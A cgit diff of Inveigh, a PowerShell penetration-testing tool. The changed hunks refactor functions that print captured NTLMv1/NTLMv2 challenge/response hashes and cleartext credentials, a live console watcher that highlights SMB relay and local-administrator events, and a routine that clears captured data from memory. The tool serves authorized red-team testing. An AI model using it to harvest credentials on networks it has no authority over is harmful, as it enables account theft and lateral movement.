- $inveigh.NTLMv1_list.Sort()
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
{
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
-
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
- {
- Write-Output $unique_NTLMv1
- }
-
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ Write-Output $unique_NTLMv1
}
- }
- elseif($Usernames)
- {
- Write-Output $inveigh.NTLMv1_username_list
- }
- else
- {
- Write-Output $inveigh.NTLMv1_list
+
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
}
}
-function Get-InveighNTLMv2
+if($NTLMv1Usernames)
{
- <#
- .SYNOPSIS
- Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes.
-
- .PARAMETER Unique
- Display only the first captured challenge/response for each unique account.
+ Write-Output $inveigh.NTLMv2_username_list
+}
- .PARAMETER Usernames
- Display IP addresses and usernames for captured NTLMv2 challenge response hashes.
- #>
+if($NTLMv2)
+{
+ Write-Output $inveigh.NTLMv2_list
+}
- param
- (
- [parameter(Mandatory=$false)][Switch]$Unique,
- [parameter(Mandatory=$false)][Switch]$Usernames,
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
- )
+if($NTLMv2Unique)
+{
+ $inveigh.NTLMv2_list.Sort()
- if($invalid_parameter)
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
{
- throw "$($invalid_parameter) is not a valid parameter."
- }
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
- if($Unique -and $Usernames)
- {
- throw "Cannot use -Unique with -Usernames."
- }
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output $unique_NTLMv2
+ }
- if($Unique)
- {
- $inveigh.NTLMv2_list.Sort()
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
- {
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+}
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
- {
- Write-Output $unique_NTLMv2
- }
+if($NTLMv2Usernames)
+{
+ Write-Output $inveigh.NTLMv2_username_list
+}
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
- }
- }
- elseif($Usernames)
- {
- Write-Output $inveigh.NTLMv2_username_list
- }
- else
- {
- Write-Output $inveigh.NTLMv2_list
- }
+if($Cleartext)
+{
+ Write-Output $inveigh.cleartext_list
+}
+if($CleartextUnique)
+{
+ Write-Output $inveigh.cleartext_list | Get-Unique
}
-function Get-InveighLog
+if($Learning)
{
- <#
- .SYNOPSIS
- Get-InveighLog will get log entries.
- #>
+ Write-Output $inveigh.valid_host_list
+}
- Write-Output $inveigh.log
}
function Watch-Inveigh
{
- <#
- .SYNOPSIS
- Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
- #>
+<#
+.SYNOPSIS
+Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+#>
+
+if($inveigh.tool -ne 1)
+{
- if($inveigh.tool -ne 1)
+ if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
{
+ Write-Output "Press any key to stop real time console output"
+ $inveigh.console_output = $true
- if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+ :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
{
- Write-Output "Press any key to stop real time console output"
- $inveigh.console_output = $true
- :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+ while($inveigh.console_queue.Count -gt 0)
{
- while($inveigh.console_queue.Count -gt 0)
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ else
{
- if($inveigh.output_stream_only)
+ switch -wildcard ($inveigh.console_queue[0])
{
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
- else
- {
-
- switch -wildcard ($inveigh.console_queue[0])
- {
- "Inveigh *exited *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- "* written to *"
- {
-
- if($inveigh.file_output)
- {
- Write-Warning $inveigh.console_queue[0]
- }
-
- $inveigh.console_queue.RemoveAt(0)
- }
+ "* written to *"
+ {
- "* for relay *"
+ if($inveigh.file_output)
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
}
- "*SMB relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ $inveigh.console_queue.RemoveAt(0)
+ }
- "* local administrator *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ "* for relay *"
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ "*SMB relay *"
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ "* local administrator *"
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
}
}
-
- }
- if([Console]::KeyAvailable)
- {
- $inveigh.console_output = $false
- BREAK console_loop
}
+
+ }
- Start-Sleep -m 5
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
}
- }
- else
- {
- Write-Output "Inveigh isn't running"
+ Start-Sleep -m 5
}
}
else
{
- Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+ Write-Output "Inveigh isn't running"
}
}
+else
+{
+ Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+}
+
+}
function Clear-Inveigh
{
- <#
- .SYNOPSIS
- Clear-Inveigh will clear Inveigh data from memory.
- #>
-
- if($inveigh)
- {
+<#
+.SYNOPSIS
+Clear-Inveigh will clear Inveigh data from memory.
+#>
- if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running)
- {
- Remove-Variable inveigh -scope global
- Write-Output "Inveigh data has been cleared from memory"
- }
- else
- {
- Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
- }
+if($inveigh)
+{
+ if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running)
+ {
+ Remove-Variable inveigh -scope global
+ Write-Output "Inveigh data has been cleared from memory"
+ }
+ else
+ {
+ Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
}
+}
+
} \ No newline at end of file
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-25 20:19:42 +0000